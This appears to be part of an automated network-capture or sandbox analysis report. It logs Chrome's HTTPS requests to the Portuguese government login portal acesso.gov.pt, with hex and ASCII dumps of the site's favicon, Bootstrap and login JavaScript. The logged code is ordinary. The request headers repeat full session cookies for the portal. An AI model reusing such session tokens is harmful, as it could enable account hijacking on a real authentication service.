                                                                                                                  2024-11-14 13:59:57 UTC13870INData Raw: 6f 72 28 67 20 69 6e 20 61 2e 63 6f 6e 76 65 72 74 65 72 73 29 6a 5b 67 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3d 61 2e 63 6f 6e 76 65 72 74 65 72 73 5b 67 5d 3b 66 3d 6b 2e 73 68 69 66 74 28 29 3b 77 68 69 6c 65 28 66 29 69 66 28 61 2e 72 65 73 70 6f 6e 73 65 46 69 65 6c 64 73 5b 66 5d 26 26 28 63 5b 61 2e 72 65 73 70 6f 6e 73 65 46 69 65 6c 64 73 5b 66 5d 5d 3d 62 29 2c 21 69 26 26 64 26 26 61 2e 64 61 74 61 46 69 6c 74 65 72 26 26 28 62 3d 61 2e 64 61 74 61 46 69 6c 74 65 72 28 62 2c 61 2e 64 61 74 61 54 79 70 65 29 29 2c 69 3d 66 2c 66 3d 6b 2e 73 68 69 66 74 28 29 29 69 66 28 22 2a 22 3d 3d 3d 66 29 66 3d 69 3b 65 6c 73 65 20 69 66 28 22 2a 22 21 3d 3d 69 26 26 69 21 3d 3d 66 29 7b 69 66 28 67 3d 6a 5b 69 2b 22 20 22 2b 66 5d 7c 7c 6a 5b 22 2a
                                                                                                                  Data Ascii: or(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["*


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.44977662.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:57 UTC1180OUTGET /autentica_static/icons/favicon.ico HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:58 UTC375INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=64
                                                                                                                  Content-Type: image/x-icon
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 6518
                                                                                                                  2024-11-14 13:59:58 UTC6518INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 28 05 00 00 26 00 00 00 20 20 00 00 01 00 20 00 28 14 00 00 4e 05 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff df d8 d3 ff df d8 d3 ff df d8 d3 ff f4 f2 f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e4 de da ff 91 79 69 ff b0 9f 93 ff f8 f6 f5 ff fb fa f9 ff df d8 d3 ff e1 db d6 ff e5 e0 dc ff f4 f2 f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e6 e1 dd ff 53 2e 14 ff 8b 72 61 ff 73 55 40 ff 77 5a 46 ff ba ab a1 ff ac 9a 8e ff 50 2a 10 ff 4e 28 0d ff af
                                                                                                                  Data Ascii: (& (N( yiS.rasU@wZFP*N(


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.44977762.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:57 UTC909OUTGET /autentica_static/js/capslock-login.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:58 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 1609
                                                                                                                  2024-11-14 13:59:58 UTC1609INData Raw: 76 61 72 20 63 61 70 73 6c 6f 63 6b 41 63 74 69 76 65 20 3d 20 66 61 6c 73 65 3b 0d 0a 76 61 72 20 69 6e 70 75 74 4e 69 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 2d 6e 69 66 22 29 3b 0d 0a 76 61 72 20 69 6e 70 75 74 45 6f 72 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 2d 65 6f 72 69 22 29 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 61 70 73 4c 6f 63 6b 45 76 65 6e 74 44 65 74 65 63 74 28 65 76 65 6e 74 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 63 61 70 73 4e 69 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 73 2d 6e 69 66 22 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 61 70 73 45
                                                                                                                  Data Ascii: var capslockActive = false;var inputNif = document.getElementById("password-nif");var inputEori = document.getElementById("password-eori");function capsLockEventDetect(event) { var capsNif = document.getElementById("caps-nif"); var capsE


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.44977862.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:57 UTC924OUTGET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:58 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 35961
                                                                                                                  2024-11-14 13:59:58 UTC16014INData Raw: 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 34 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51
                                                                                                                  Data Ascii: /*! * Bootstrap v3.3.4 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQ
                                                                                                                  2024-11-14 13:59:58 UTC16384INData Raw: 65 46 6f 63 75 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 66 66 28 22 66 6f 63 75 73 69 6e 2e 62 73 2e 6d 6f 64 61 6c 22 29 2e 6f 6e 28 22 66 6f 63 75 73 69 6e 2e 62 73 2e 6d 6f 64 61 6c 22 2c 61 2e 70 72 6f 78 79 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 3d 3d 3d 61 2e 74 61 72 67 65 74 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 28 61 2e 74 61 72 67 65 74 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 2c 74 68 69 73 29 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 73 63 61 70 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 73 53 68 6f 77 6e 26 26 74 68 69 73 2e 6f 70 74 69 6f
                                                                                                                  Data Ascii: eFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.trigger("focus")},this))},c.prototype.escape=function(){this.isShown&&this.optio
                                                                                                                  2024-11-14 13:59:58 UTC370INData Raw: 65 6e 74 65 64 28 29 29 7b 76 61 72 20 68 3d 61 28 64 29 3b 74 68 69 73 2e 61 63 74 69 76 61 74 65 28 62 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 2c 63 29 2c 74 68 69 73 2e 61 63 74 69 76 61 74 65 28 68 2c 68 2e 70 61 72 65 6e 74 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 74 72 69 67 67 65 72 28 7b 74 79 70 65 3a 22 68 69 64 64 65 6e 2e 62 73 2e 74 61 62 22 2c 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 62 5b 30 5d 7d 29 2c 62 2e 74 72 69 67 67 65 72 28 7b 74 79 70 65 3a 22 73 68 6f 77 6e 2e 62 73 2e 74 61 62 22 2c 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 65 5b 30 5d 7d 29 7d 29 7d 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 61 63 74 69 76 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 64 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 67 2e 72 65
                                                                                                                  Data Ascii: ented()){var h=a(d);this.activate(b.closest("li"),c),this.activate(h,h.parent(),function(){e.trigger({type:"hidden.bs.tab",relatedTarget:b[0]}),b.trigger({type:"shown.bs.tab",relatedTarget:e[0]})})}}},c.prototype.activate=function(b,d,e){function f(){g.re
                                                                                                                  2024-11-14 13:59:58 UTC3193INData Raw: 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 62 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2e 66 69 6e 64 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 74 61 62 22 5d 27 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 30 29 2c 68 3f 28 62 5b 30 5d 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 62 2e 61 64 64 43 6c 61 73 73 28 22 69 6e 22 29 29 3a 62 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 61 64 65 22 29 2c 62 2e 70 61 72 65 6e 74 28 22 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 29 2e 6c 65 6e 67 74 68 26 26 62 2e 63 6c 6f 73 65 73 74 28 22 6c 69 2e 64 72 6f 70 64 6f 77 6e 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2e 65 6e 64 28 29 2e 66 69 6e 64 28 27 5b 64 61 74 61 2d 74 6f 67
                                                                                                                  Data Ascii: ("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-tog


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.44977962.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:57 UTC898OUTGET /autentica_static/js/app.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:58 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 58651
                                                                                                                  2024-11-14 13:59:58 UTC16014INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 53 41 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 41 20 3d 20 7b 7d 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2f 2f 2a 0d 0a 20 20 20 20 2f 2f 2a 20 47 65 6e 65 72 69 63 20 4d 6f 64 61 6c 20 46 75 6e 63 74 69 6f 6e 20 28 4f 70 65 6e 20 61 6e 64 20 43 6c 6f 73 65 29 0d 0a 20 20 20 20 2f 2f 2a 0d 0a 0d 0a 20 20 20 20 53 41 2e 4d 6f 64 61 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 4f 70 65 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 2e 66 61 64 65 49 6e 28
                                                                                                                  Data Ascii: (function ($) { if (!window.SA) { SA = {}; } //* //* Generic Modal Function (Open and Close) //* SA.Modal = function () { return { Open: function (id, callback) { id.fadeIn(
                                                                                                                  2024-11-14 13:59:58 UTC16384INData Raw: 61 72 65 6e 74 28 29 2e 70 61 72 65 6e 74 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72 72 6f 72 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 65 46 6f 72 6d 2e 66 69 6e 64 28 27 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 63 68 65 63 6b 62 6f 78 2c 20 74 65 78 74 61 72 65 61 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 65 6c 70 2d 62 6c 6f 63 6b 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 62 65 6c 2e 72 65 6d 6f 76 65 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: arent().parent().removeClass('has-error'); } theForm.find('input, select, checkbox, textarea').removeClass('help-block'); label.remove(); },
                                                                                                                  2024-11-14 13:59:58 UTC370INData Raw: 42 74 6e 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 75 62 6d 69 74 42 74 6e 2e 68 61 73 43 6c 61 73 73 28 27 65 78 74 65 72 6e 61 6c 50 61 72 74 69 63 69 70 61 6e 74 27 29 29 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 41 2e 4d 6f 64 61 6c 2e 4f 70 65 6e 28 24 28 27 23 63 6f 6e 66 69 72 6d 4d 6f 64 61 6c 27 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69
                                                                                                                  Data Ascii: Btn.click(function(event){ event.preventDefault(); if(submitBtn.hasClass('externalParticipant')) { SA.Modal.Open($('#confirmModal'),function(){ var submi
                                                                                                                  2024-11-14 13:59:58 UTC16384INData Raw: 29 2e 62 69 6e 64 28 27 63 6c 69 63 6b 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 74 65 72 6d 73 2e 66 69 6e 64 28 27 69 6e 70 75 74 27 29 2e 70 72 6f 70 28 27 63 68 65 63 6b 65 64 27 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 61 62 6c 65 45 6c 65 6d 65 6e 74 73 28 5b 73 75 62 6d 69 74 42 74 6e 2c 20 73 75 62 6d 69 74 42 74 6e 45 78 74 65 72 6e 61 6c 50 61 72 74 69 63 69 70 61 6e 74 5d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 65 46 6f 72 6d 2e 73 75 62 6d 69 74 28 29 3b 0d 0a 20 20
                                                                                                                  Data Ascii: ).bind('click',function(){ checkterms.find('input').prop('checked', true); disableElements([submitBtn, submitBtnExternalParticipant]); theForm.submit();
                                                                                                                  2024-11-14 13:59:58 UTC9499INData Raw: 20 3d 20 24 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 70 61 72 65 6e 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 6d 43 6f 6e 74 61 69 6e 65 72 20 3d 20 24 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72 72 6f 72 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 6d 43 6f 6e 74 61 69 6e 65 72 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72
                                                                                                                  Data Ascii: = $(this).parent().parent(); } else { elmContainer = $(this).parent(); $(this).removeClass('has-error'); } elmContainer.removeClass('has-er


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.44978162.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:58 UTC896OUTGET /autentica_static/icons/favicon.ico HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:59 UTC375INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=64
                                                                                                                  Content-Type: image/x-icon
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:59 GMT
                                                                                                                  Age: 3
                                                                                                                  Content-Length: 6518
                                                                                                                  2024-11-14 13:59:59 UTC6518INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 28 05 00 00 26 00 00 00 20 20 00 00 01 00 20 00 28 14 00 00 4e 05 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff df d8 d3 ff df d8 d3 ff df d8 d3 ff f4 f2 f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e4 de da ff 91 79 69 ff b0 9f 93 ff f8 f6 f5 ff fb fa f9 ff df d8 d3 ff e1 db d6 ff e5 e0 dc ff f4 f2 f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e6 e1 dd ff 53 2e 14 ff 8b 72 61 ff 73 55 40 ff 77 5a 46 ff ba ab a1 ff ac 9a 8e ff 50 2a 10 ff 4e 28 0d ff af
                                                                                                                  Data Ascii: (& (N( yiS.rasU@wZFP*N(


